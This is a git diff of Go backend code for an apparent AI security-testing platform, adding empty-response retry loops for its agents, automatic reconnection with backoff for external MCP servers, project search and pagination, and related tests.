progressCallback("eino_empty_response_continue", fmt.Sprintf("未捕获到助手正文,正在基于轨迹自动续跑(%d/%d)…", attemptNo, maxAttempts), map[string]interface{}{
"conversationId": conversationID,
"source": "eino",
"attempt": attemptNo,
"maxAttempts": maxAttempts,
"resumeKind": "trace_segment",
})
}
h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage)
if sendProgress != nil {
sendProgress("已恢复上下文,正在继续推理…", map[string]interface{}{
"conversationId": conversationID,
"source": "empty_response_continue",
})
}
return true, false
}
+69 -15
View File
@@ -178,6 +178,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
var cumulativeMCPExecutionIDs []string var cumulativeMCPExecutionIDs []string
var transientRunAttempts int var transientRunAttempts int
var emptyResponseAttempts int
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。 // 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
var mainIterationOffset int var mainIterationOffset int
@@ -225,6 +226,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
h.agent, h.agent,
h.logger, h.logger,
conversationID, conversationID,
h.conversationProjectID(conversationID),
curFinalMessage, curFinalMessage,
curHistory, curHistory,
roleTools, roleTools,
@@ -237,9 +239,32 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs) cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
} }
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, conversationID, result, runErr, &emptyResponseAttempts,
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
)
if exhaustedEmpty {
runErr = nil
transientRunAttempts = 0
timeoutCancel()
break
}
if handledEmpty {
mainIterationOffset += segmentMainIterationMax
transientRunAttempts = 0
timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
h.tasks.UpdateTaskStatus(conversationID, "running")
continue
}
if runErr == nil { if runErr == nil {
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。 // 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
transientRunAttempts = 0 transientRunAttempts = 0
emptyResponseAttempts = 0
timeoutCancel() timeoutCancel()
break break
} }
@@ -418,21 +443,50 @@ func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
return return
} }
result, runErr := multiagent.RunEinoSingleChatModelAgent( curHist := prep.History
taskCtx, curMsg := prep.FinalMessage
h.config, var result *multiagent.RunResult
&h.config.MultiAgent, var runErr error
h.agent, var transientRunAttempts int
h.logger, var emptyResponseAttempts int
prep.ConversationID, for {
prep.FinalMessage, result, runErr = multiagent.RunEinoSingleChatModelAgent(
prep.History, taskCtx,
prep.RoleTools, h.config,
progressCallback, &h.config.MultiAgent,
chatReasoningToClientIntent(req.Reasoning), h.agent,
h.projectBlackboardBlock(prep.ConversationID), h.logger,
) prep.ConversationID,
if runErr != nil { h.conversationProjectID(prep.ConversationID),
curMsg,
curHist,
prep.RoleTools,
progressCallback,
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
)
if exhaustedEmpty {
runErr = nil
break
}
if handledEmpty {
continue
}
if runErr == nil {
break
}
if handled, fatalErr := h.handleEinoTransientRetryContinue(
baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
); handled {
continue
} else if fatalErr != nil {
runErr = fatalErr
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result) h.persistEinoAgentTraceForResume(prep.ConversationID, result)
} }
+10 -11
View File
@@ -64,10 +64,7 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
} }
toolCount := toolCounts[name] toolCount := toolCounts[name]
errorMsg := "" errorMsg := externalMCPStatusError(h.manager, name, status)
if status == "error" {
errorMsg = h.manager.GetError(name)
}
result[name] = ExternalMCPResponse{ result[name] = ExternalMCPResponse{
Config: cfg, Config: cfg,
@@ -115,20 +112,22 @@ func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
} }
} }
// 获取错误信息
errorMsg := ""
if status == "error" {
errorMsg = h.manager.GetError(name)
}
c.JSON(http.StatusOK, ExternalMCPResponse{ c.JSON(http.StatusOK, ExternalMCPResponse{
Config: cfg, Config: cfg,
Status: status, Status: status,
ToolCount: toolCount, ToolCount: toolCount,
Error: errorMsg, Error: externalMCPStatusError(h.manager, name, status),
}) })
} }
// externalMCPStatusError 在 error/disconnected 状态下返回最近错误(含断连原因)。
func externalMCPStatusError(manager *mcp.ExternalMCPManager, name, status string) string {
if status != "error" && status != "disconnected" {
return ""
}
return manager.GetError(name)
}
// AddOrUpdateExternalMCP 添加或更新外部MCP配置 // AddOrUpdateExternalMCP 添加或更新外部MCP配置
func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) { func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
var req AddOrUpdateExternalMCPRequest var req AddOrUpdateExternalMCPRequest
+10
View File
@@ -271,6 +271,16 @@ func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
} }
} }
func TestExternalMCPStatusError(t *testing.T) {
manager := mcp.NewExternalMCPManager(zap.NewNop())
if got := externalMCPStatusError(manager, "x", "connected"); got != "" {
t.Fatalf("connected status should not return error, got %q", got)
}
if got := externalMCPStatusError(manager, "x", "connecting"); got != "" {
t.Fatalf("connecting status should not return error, got %q", got)
}
}
func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) { func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
router, handler, _ := setupTestRouter() router, handler, _ := setupTestRouter()
+36 -4
View File
@@ -77,8 +77,8 @@ func (h *MonitorHandler) Monitor(c *gin.Context) {
// 解析状态筛选参数 // 解析状态筛选参数
status := c.Query("status") status := c.Query("status")
// 解析工具筛选参数 // 解析工具筛选参数(兼容 mcp__tool 与内部 mcp::tool
toolName := c.Query("tool") toolName := normalizeToolNameFilter(c.Query("tool"))
executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName) executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName)
stats := h.loadStats() stats := h.loadStats()
@@ -113,7 +113,7 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
for _, exec := range allExecutions { for _, exec := range allExecutions {
matchStatus := status == "" || exec.Status == status matchStatus := status == "" || exec.Status == status
// 支持部分匹配(模糊搜索) // 支持部分匹配(模糊搜索)
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName)) matchTool := toolNameFilterMatches(exec.ToolName, toolName)
if matchStatus && matchTool { if matchStatus && matchTool {
filtered = append(filtered, exec) filtered = append(filtered, exec)
} }
@@ -143,7 +143,7 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
for _, exec := range allExecutions { for _, exec := range allExecutions {
matchStatus := status == "" || exec.Status == status matchStatus := status == "" || exec.Status == status
// 支持部分匹配(模糊搜索) // 支持部分匹配(模糊搜索)
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName)) matchTool := toolNameFilterMatches(exec.ToolName, toolName)
if matchStatus && matchTool { if matchStatus && matchTool {
filtered = append(filtered, exec) filtered = append(filtered, exec)
} }
@@ -584,3 +584,35 @@ func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs))) h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs)))
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"}) c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
} }
// normalizeToolNameFilter 将模型侧 mcp__tool 转为内部存储用的 mcp::tool。
func normalizeToolNameFilter(name string) string {
name = strings.TrimSpace(name)
if name == "" {
return name
}
if strings.Contains(name, "::") {
return name
}
if idx := strings.Index(name, "__"); idx > 0 {
return name[:idx] + "::" + name[idx+2:]
}
return name
}
func toolNameFilterMatches(storedName, filter string) bool {
filter = strings.TrimSpace(filter)
if filter == "" {
return true
}
storedLower := strings.ToLower(storedName)
filterLower := strings.ToLower(filter)
if strings.Contains(storedLower, filterLower) {
return true
}
normFilter := strings.ToLower(normalizeToolNameFilter(filter))
if normFilter != filterLower && strings.Contains(storedLower, normFilter) {
return true
}
return strings.Contains(strings.ReplaceAll(storedLower, "::", "__"), filterLower)
}
+71 -17
View File
@@ -188,6 +188,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
// 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表 // 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
var cumulativeMCPExecutionIDs []string var cumulativeMCPExecutionIDs []string
var transientRunAttempts int var transientRunAttempts int
var emptyResponseAttempts int
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。 // 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
var mainIterationOffset int var mainIterationOffset int
@@ -235,6 +236,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
h.agent, h.agent,
h.logger, h.logger,
conversationID, conversationID,
h.conversationProjectID(conversationID),
curFinalMessage, curFinalMessage,
curHistory, curHistory,
roleTools, roleTools,
@@ -249,9 +251,32 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs) cumulativeMCPExecutionIDs = mergeMCPExecutionIDLists(cumulativeMCPExecutionIDs, result.MCPExecutionIDs)
} }
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, conversationID, result, runErr, &emptyResponseAttempts,
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
)
if exhaustedEmpty {
runErr = nil
transientRunAttempts = 0
timeoutCancel()
break
}
if handledEmpty {
mainIterationOffset += segmentMainIterationMax
transientRunAttempts = 0
timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
h.tasks.UpdateTaskStatus(conversationID, "running")
continue
}
if runErr == nil { if runErr == nil {
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。 // 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
transientRunAttempts = 0 transientRunAttempts = 0
emptyResponseAttempts = 0
timeoutCancel() timeoutCancel()
break break
} }
@@ -430,23 +455,52 @@ func (h *AgentHandler) MultiAgentLoop(c *gin.Context) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments) return h.interceptHITLForEinoTool(ctx, cancelWithCause, prep.ConversationID, prep.AssistantMessageID, nil, toolName, arguments)
}) })
result, runErr := multiagent.RunDeepAgent( curHist := prep.History
taskCtx, curMsg := prep.FinalMessage
h.config, var result *multiagent.RunResult
&h.config.MultiAgent, var runErr error
h.agent, var transientRunAttempts int
h.logger, var emptyResponseAttempts int
prep.ConversationID, for {
prep.FinalMessage, result, runErr = multiagent.RunDeepAgent(
prep.History, taskCtx,
prep.RoleTools, h.config,
progressCallback, &h.config.MultiAgent,
h.agentsMarkdownDir, h.agent,
strings.TrimSpace(req.Orchestration), h.logger,
chatReasoningToClientIntent(req.Reasoning), prep.ConversationID,
h.projectBlackboardBlock(prep.ConversationID), h.conversationProjectID(prep.ConversationID),
) curMsg,
if runErr != nil { curHist,
prep.RoleTools,
progressCallback,
h.agentsMarkdownDir,
strings.TrimSpace(req.Orchestration),
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
handledEmpty, exhaustedEmpty := h.handleEinoEmptyResponseContinue(
baseCtx, prep.ConversationID, result, runErr, &emptyResponseAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
)
if exhaustedEmpty {
runErr = nil
break
}
if handledEmpty {
continue
}
if runErr == nil {
break
}
if handled, fatalErr := h.handleEinoTransientRetryContinue(
baseCtx, prep.ConversationID, result, runErr, &transientRunAttempts,
&curHist, &curMsg, prep.FinalMessage, progressCallback, nil,
); handled {
continue
} else if fatalErr != nil {
runErr = fatalErr
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result) h.persistEinoAgentTraceForResume(prep.ConversationID, result)
} }
+5 -36
View File
@@ -2,10 +2,8 @@ package handler
import ( import (
"net/http" "net/http"
"time"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/storage"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"go.uber.org/zap" "go.uber.org/zap"
@@ -15,17 +13,15 @@ import (
type OpenAPIHandler struct { type OpenAPIHandler struct {
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
resultStorage storage.ResultStorage
conversationHdlr *ConversationHandler conversationHdlr *ConversationHandler
agentHdlr *AgentHandler agentHdlr *AgentHandler
} }
// NewOpenAPIHandler 创建新的OpenAPI处理器 // NewOpenAPIHandler 创建新的OpenAPI处理器
func NewOpenAPIHandler(db *database.DB, logger *zap.Logger, resultStorage storage.ResultStorage, conversationHdlr *ConversationHandler, agentHdlr *AgentHandler) *OpenAPIHandler { func NewOpenAPIHandler(db *database.DB, logger *zap.Logger, conversationHdlr *ConversationHandler, agentHdlr *AgentHandler) *OpenAPIHandler {
return &OpenAPIHandler{ return &OpenAPIHandler{
db: db, db: db,
logger: logger, logger: logger,
resultStorage: resultStorage,
conversationHdlr: conversationHdlr, conversationHdlr: conversationHdlr,
agentHdlr: agentHdlr, agentHdlr: agentHdlr,
} }
@@ -237,7 +233,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"status": map[string]interface{}{ "status": map[string]interface{}{
"type": "string", "type": "string",
"description": "状态", "description": "状态",
"enum": []string{"open", "closed", "fixed"}, "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
}, },
"target": map[string]interface{}{ "target": map[string]interface{}{
"type": "string", "type": "string",
@@ -575,7 +571,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"status": map[string]interface{}{ "status": map[string]interface{}{
"type": "string", "type": "string",
"description": "状态", "description": "状态",
"enum": []string{"open", "closed", "fixed"}, "enum": []string{"open", "confirmed", "fixed", "false_positive", "ignored"},
}, },
"type": map[string]interface{}{ "type": map[string]interface{}{
"type": "string", "type": "string",
@@ -1344,7 +1340,7 @@ func (h *OpenAPIHandler) GetOpenAPISpec(c *gin.Context) {
"delete": map[string]interface{}{ "delete": map[string]interface{}{
"tags": []string{"对话管理"}, "tags": []string{"对话管理"},
"summary": "删除对话", "summary": "删除对话",
"description": "删除指定的对话及其所有相关数据(消息、漏洞等)。**此操作不可恢复**。", "description": "删除指定的对话及其会话数据(消息、攻击链等)。**漏洞记录会保留**,仅解除与会话的关联。**此操作不可恢复**。",
"operationId": "deleteConversation", "operationId": "deleteConversation",
"parameters": []map[string]interface{}{ "parameters": []map[string]interface{}{
{ {
@@ -6354,35 +6350,8 @@ func (h *OpenAPIHandler) GetConversationResults(c *gin.Context) {
vulnerabilities[i] = *v vulnerabilities[i] = *v
} }
// 获取执行结果(从MCP执行记录中获取 // 获取执行结果(历史大结果由 Eino reduction 落盘,此处不再聚合文件存储
executionResults := []map[string]interface{}{} executionResults := []map[string]interface{}{}
for _, msg := range messages {
if len(msg.MCPExecutionIDs) > 0 {
for _, execID := range msg.MCPExecutionIDs {
// 尝试从结果存储中获取执行结果
if h.resultStorage != nil {
result, err := h.resultStorage.GetResult(execID)
if err == nil && result != "" {
// 获取元数据以获取工具名称和创建时间
metadata, err := h.resultStorage.GetResultMetadata(execID)
toolName := "unknown"
createdAt := time.Now()
if err == nil && metadata != nil {
toolName = metadata.ToolName
createdAt = metadata.CreatedAt
}
executionResults = append(executionResults, map[string]interface{}{
"id": execID,
"toolName": toolName,
"status": "success",
"result": result,
"createdAt": createdAt.Format(time.RFC3339),
})
}
}
}
}
}
response := map[string]interface{}{ response := map[string]interface{}{
"conversationId": conv.ID, "conversationId": conv.ID,
+53 -43
View File
@@ -12,6 +12,16 @@ import (
"go.uber.org/zap" "go.uber.org/zap"
) )
const maxProjectDescriptionRunes = 4000
func clampProjectDescription(s string) string {
r := []rune(s)
if len(r) <= maxProjectDescriptionRunes {
return s
}
return string(r[:maxProjectDescriptionRunes])
}
// ProjectHandler 项目管理处理器。 // ProjectHandler 项目管理处理器。
type ProjectHandler struct { type ProjectHandler struct {
db *database.DB db *database.DB
@@ -48,7 +58,7 @@ func (h *ProjectHandler) CreateProject(c *gin.Context) {
} }
p := &database.Project{ p := &database.Project{
Name: strings.TrimSpace(req.Name), Name: strings.TrimSpace(req.Name),
Description: req.Description, Description: clampProjectDescription(req.Description),
ScopeJSON: req.ScopeJSON, ScopeJSON: req.ScopeJSON,
Status: strings.TrimSpace(req.Status), Status: strings.TrimSpace(req.Status),
} }
@@ -61,12 +71,40 @@ func (h *ProjectHandler) CreateProject(c *gin.Context) {
c.JSON(http.StatusOK, created) c.JSON(http.StatusOK, created)
} }
// GetDashboardSummary GET /api/projects/dashboard-summary
func (h *ProjectHandler) GetDashboardSummary(c *gin.Context) {
limit, _ := strconv.Atoi(strings.TrimSpace(c.DefaultQuery("fact_limit", "5")))
if limit <= 0 {
limit = 5
}
if limit > 50 {
limit = 50
}
summary, err := h.db.GetProjectDashboardSummary(limit)
if err != nil {
h.logger.Error("获取项目仪表盘摘要失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
if summary.RecentFacts == nil {
summary.RecentFacts = []database.ProjectDashboardFact{}
}
c.JSON(http.StatusOK, summary)
}
// ListProjects GET /api/projects // ListProjects GET /api/projects
func (h *ProjectHandler) ListProjects(c *gin.Context) { func (h *ProjectHandler) ListProjects(c *gin.Context) {
status := c.Query("status") status := c.Query("status")
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "200")) search := c.Query("search")
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "50"))
offset, _ := strconv.Atoi(c.Query("offset")) offset, _ := strconv.Atoi(c.Query("offset"))
list, err := h.db.ListProjects(status, limit, offset) if limit <= 0 {
limit = 50
}
if limit > 500 {
limit = 500
}
list, err := h.db.ListProjects(status, search, limit, offset)
if err != nil { if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return return
@@ -74,7 +112,17 @@ func (h *ProjectHandler) ListProjects(c *gin.Context) {
if list == nil { if list == nil {
list = []*database.Project{} list = []*database.Project{}
} }
c.JSON(http.StatusOK, list) total, err := h.db.CountProjects(status, search)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusOK, gin.H{
"projects": list,
"total": total,
"limit": limit,
"offset": offset,
})
} }
// GetProjectStats GET /api/projects/:id/stats // GetProjectStats GET /api/projects/:id/stats
@@ -146,7 +194,7 @@ func (h *ProjectHandler) UpdateProject(c *gin.Context) {
} }
} }
if req.Description != nil { if req.Description != nil {
p.Description = *req.Description p.Description = clampProjectDescription(*req.Description)
} }
if req.ScopeJSON != nil { if req.ScopeJSON != nil {
p.ScopeJSON = *req.ScopeJSON p.ScopeJSON = *req.ScopeJSON
@@ -240,44 +288,6 @@ func (h *ProjectHandler) ListFacts(c *gin.Context) {
c.JSON(http.StatusOK, list) c.JSON(http.StatusOK, list)
} }
// GetFactPreviousVersion GET /api/projects/:id/facts/:factId/previous-version
func (h *ProjectHandler) GetFactPreviousVersion(c *gin.Context) {
existing, err := h.db.GetProjectFact(c.Param("factId"))
if err != nil || existing.ProjectID != c.Param("id") {
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
return
}
if strings.TrimSpace(existing.SupersedesFactID) == "" {
c.JSON(http.StatusNotFound, gin.H{"error": "无上一版本"})
return
}
v, err := h.db.GetProjectFactVersion(existing.SupersedesFactID)
if err != nil {
c.JSON(http.StatusNotFound, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusOK, v)
}
// ListFactVersions GET /api/projects/:id/facts/:factId/versions
func (h *ProjectHandler) ListFactVersions(c *gin.Context) {
existing, err := h.db.GetProjectFact(c.Param("factId"))
if err != nil || existing.ProjectID != c.Param("id") {
c.JSON(http.StatusNotFound, gin.H{"error": "事实不存在"})
return
}
limit, _ := strconv.Atoi(c.DefaultQuery("limit", "20"))
list, err := h.db.ListProjectFactVersions(existing.ID, limit)
if err != nil {
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
if list == nil {
list = []*database.ProjectFactVersion{}
}
c.JSON(http.StatusOK, list)
}
// CreateFact POST /api/projects/:id/facts // CreateFact POST /api/projects/:id/facts
func (h *ProjectHandler) CreateFact(c *gin.Context) { func (h *ProjectHandler) CreateFact(c *gin.Context) {
var req upsertFactRequest var req upsertFactRequest
+16
View File
@@ -30,3 +30,19 @@ func (h *AgentHandler) projectBlackboardBlock(conversationID string) string {
} }
return strings.TrimSpace(block) return strings.TrimSpace(block)
} }
// conversationProjectID 返回对话绑定的项目 ID;未绑定或查询失败时返回空字符串。
func (h *AgentHandler) conversationProjectID(conversationID string) string {
if h == nil || h.db == nil {
return ""
}
conversationID = strings.TrimSpace(conversationID)
if conversationID == "" {
return ""
}
projectID, err := h.db.GetConversationProjectID(conversationID)
if err != nil {
return ""
}
return strings.TrimSpace(projectID)
}
+2 -2
View File
@@ -314,7 +314,7 @@ func (h *RobotHandler) resolveProjectByIDOrName(idOrName string) (*database.Proj
if p, err := h.db.GetProject(idOrName); err == nil { if p, err := h.db.GetProject(idOrName); err == nil {
return p, "" return p, ""
} }
list, err := h.db.ListProjects("", 200, 0) list, err := h.db.ListProjects("", "", 200, 0)
if err != nil { if err != nil {
return nil, "查询项目失败: " + err.Error() return nil, "查询项目失败: " + err.Error()
} }
@@ -353,7 +353,7 @@ func (h *RobotHandler) cmdProjects() string {
if !h.projectsEnabled() { if !h.projectsEnabled() {
return "项目功能未启用(config.project.enabled)。" return "项目功能未启用(config.project.enabled)。"
} }
list, err := h.db.ListProjects("", 50, 0) list, err := h.db.ListProjects("", "", 50, 0)
if err != nil { if err != nil {
return "获取项目列表失败: " + err.Error() return "获取项目列表失败: " + err.Error()
} }
+17
View File
@@ -190,6 +190,23 @@ func (c *lazySDKClient) Close() error {
return nil return nil
} }
// markDisconnected 在检测到传输层断连时关闭底层 session,避免 IsConnected 仍返回 true。
func (c *lazySDKClient) markDisconnected() {
c.mu.Lock()
inner := c.inner
sessionCancel := c.sessionCancel
c.inner = nil
c.sessionCancel = nil
c.mu.Unlock()
if sessionCancel != nil {
sessionCancel()
}
if inner != nil {
_ = inner.Close()
}
c.setStatus("disconnected")
}
func (c *sdkClient) setStatus(s string) { func (c *sdkClient) setStatus(s string) {
c.mu.Lock() c.mu.Lock()
defer c.mu.Unlock() defer c.mu.Unlock()
+192
View File
@@ -0,0 +1,192 @@
package mcp
import (
"context"
"errors"
"io"
"strings"
"time"
"go.uber.org/zap"
)
const (
// externalReconnectMinInterval 两次自动重连之间的最短间隔
externalReconnectMinInterval = 30 * time.Second
// externalReconnectMaxBackoff 指数退避上限
externalReconnectMaxBackoff = 5 * time.Minute
)
// isConnectionDeadError 判断错误是否表示底层传输已断开(而非调用方主动取消或超时)。
func isConnectionDeadError(err error) bool {
if err == nil {
return false
}
if errors.Is(err, context.Canceled) || errors.Is(err, context.DeadlineExceeded) {
return false
}
if errors.Is(err, io.EOF) {
return true
}
s := strings.ToLower(err.Error())
return strings.Contains(s, "eof") ||
strings.Contains(s, "client is closing") ||
strings.Contains(s, "connection closed") ||
strings.Contains(s, "connection reset") ||
strings.Contains(s, "broken pipe")
}
// handleConnectionDead 在 ListTools/CallTool 等操作失败且判定为断连时,标记客户端并调度重连。
func (m *ExternalMCPManager) handleConnectionDead(name string, client ExternalMCPClient, err error) {
if !isConnectionDeadError(err) {
return
}
m.logger.Warn("检测到外部MCP连接已断开,将尝试自动重连",
zap.String("name", name),
zap.Error(err),
)
m.markClientDisconnected(name, client, err)
m.scheduleReconnect(name)
}
func (m *ExternalMCPManager) markClientDisconnected(name string, client ExternalMCPClient, err error) {
if lazy, ok := client.(*lazySDKClient); ok {
lazy.markDisconnected()
}
m.mu.Lock()
if err != nil {
m.errors[name] = "连接已断开: " + err.Error()
}
m.mu.Unlock()
m.toolCountsMu.Lock()
m.toolCounts[name] = 0
m.toolCountsMu.Unlock()
}
func (m *ExternalMCPManager) onClientConnected(name string) {
m.clearReconnectState(name)
}
func (m *ExternalMCPManager) clearReconnectState(name string) {
m.reconnectMu.Lock()
delete(m.reconnectAttempts, name)
delete(m.reconnectLastTry, name)
delete(m.reconnecting, name)
m.reconnectMu.Unlock()
}
func (m *ExternalMCPManager) reconnectBackoff(attempts int) time.Duration {
if attempts <= 0 {
return 0
}
d := externalReconnectMinInterval
for i := 1; i < attempts && d < externalReconnectMaxBackoff; i++ {
d *= 2
}
if d > externalReconnectMaxBackoff {
return externalReconnectMaxBackoff
}
return d
}
func (m *ExternalMCPManager) scheduleReconnect(name string) {
m.mu.RLock()
cfg, exists := m.configs[name]
enabled := exists && m.isEnabled(cfg)
m.mu.RUnlock()
if !enabled {
return
}
go m.tryReconnect(name)
}
func (m *ExternalMCPManager) tryReconnect(name string) {
m.reconnectMu.Lock()
if m.reconnecting[name] {
m.reconnectMu.Unlock()
return
}
attempts := m.reconnectAttempts[name]
if wait := m.reconnectBackoff(attempts); wait > 0 {
if last, ok := m.reconnectLastTry[name]; ok {
if elapsed := time.Since(last); elapsed < wait {
remaining := wait - elapsed
m.reconnectMu.Unlock()
m.scheduleReconnectAfter(name, remaining)
return
}
}
}
m.reconnecting[name] = true
m.reconnectMu.Unlock()
defer func() {
m.reconnectMu.Lock()
delete(m.reconnecting, name)
m.reconnectMu.Unlock()
}()
m.mu.RLock()
cfg, exists := m.configs[name]
enabled := exists && m.isEnabled(cfg)
client, hasClient := m.clients[name]
connecting := hasClient && client.GetStatus() == "connecting"
m.mu.RUnlock()
if !enabled {
m.logger.Debug("跳过自动重连(外部MCP已停用)", zap.String("name", name))
return
}
if connecting {
m.logger.Debug("跳过自动重连(连接正在进行中)", zap.String("name", name))
return
}
m.reconnectMu.Lock()
m.reconnectLastTry[name] = time.Now()
m.reconnectAttempts[name] = attempts + 1
attemptNum := m.reconnectAttempts[name]
m.reconnectMu.Unlock()
m.logger.Info("正在自动重连外部MCP",
zap.String("name", name),
zap.Int("attempt", attemptNum),
)
if err := m.startClient(name, true); err != nil {
m.logger.Warn("自动重连外部MCP失败",
zap.String("name", name),
zap.Error(err),
)
}
}
// scheduleReconnectAfterFailure 在自动重连失败后,按当前退避间隔预约下一次重试。
func (m *ExternalMCPManager) scheduleReconnectAfterFailure(name string) {
m.mu.RLock()
cfg, exists := m.configs[name]
enabled := exists && m.isEnabled(cfg)
m.mu.RUnlock()
if !enabled {
return
}
m.reconnectMu.Lock()
wait := m.reconnectBackoff(m.reconnectAttempts[name])
m.reconnectMu.Unlock()
m.logger.Info("自动重连失败,将按退避间隔再次尝试",
zap.String("name", name),
zap.Duration("after", wait),
)
m.scheduleReconnectAfter(name, wait)
}
// scheduleReconnectAfter 在 delay 后触发 tryReconnectdelay<=0 时立即执行)。
func (m *ExternalMCPManager) scheduleReconnectAfter(name string, delay time.Duration) {
if delay <= 0 {
go m.tryReconnect(name)
return
}
time.AfterFunc(delay, func() {
m.tryReconnect(name)
})
}
+215
View File
@@ -0,0 +1,215 @@
package mcp
import (
"context"
"errors"
"fmt"
"io"
"testing"
"time"
"cyberstrike-ai/internal/config"
"go.uber.org/zap"
)
func TestIsConnectionDeadError(t *testing.T) {
t.Parallel()
cases := []struct {
name string
err error
want bool
}{
{"nil", nil, false},
{"eof", io.EOF, true},
{"wrapped eof", fmt.Errorf("connection closed: %w", io.EOF), true},
{"client closing", errors.New(`calling "tools/list": client is closing: EOF`), true},
{"connection reset", errors.New("read tcp: connection reset by peer"), true},
{"canceled", context.Canceled, false},
{"deadline", context.DeadlineExceeded, false},
{"other", errors.New("invalid params"), false},
}
for _, tc := range cases {
tc := tc
t.Run(tc.name, func(t *testing.T) {
t.Parallel()
if got := isConnectionDeadError(tc.err); got != tc.want {
t.Fatalf("isConnectionDeadError(%v) = %v, want %v", tc.err, got, tc.want)
}
})
}
}
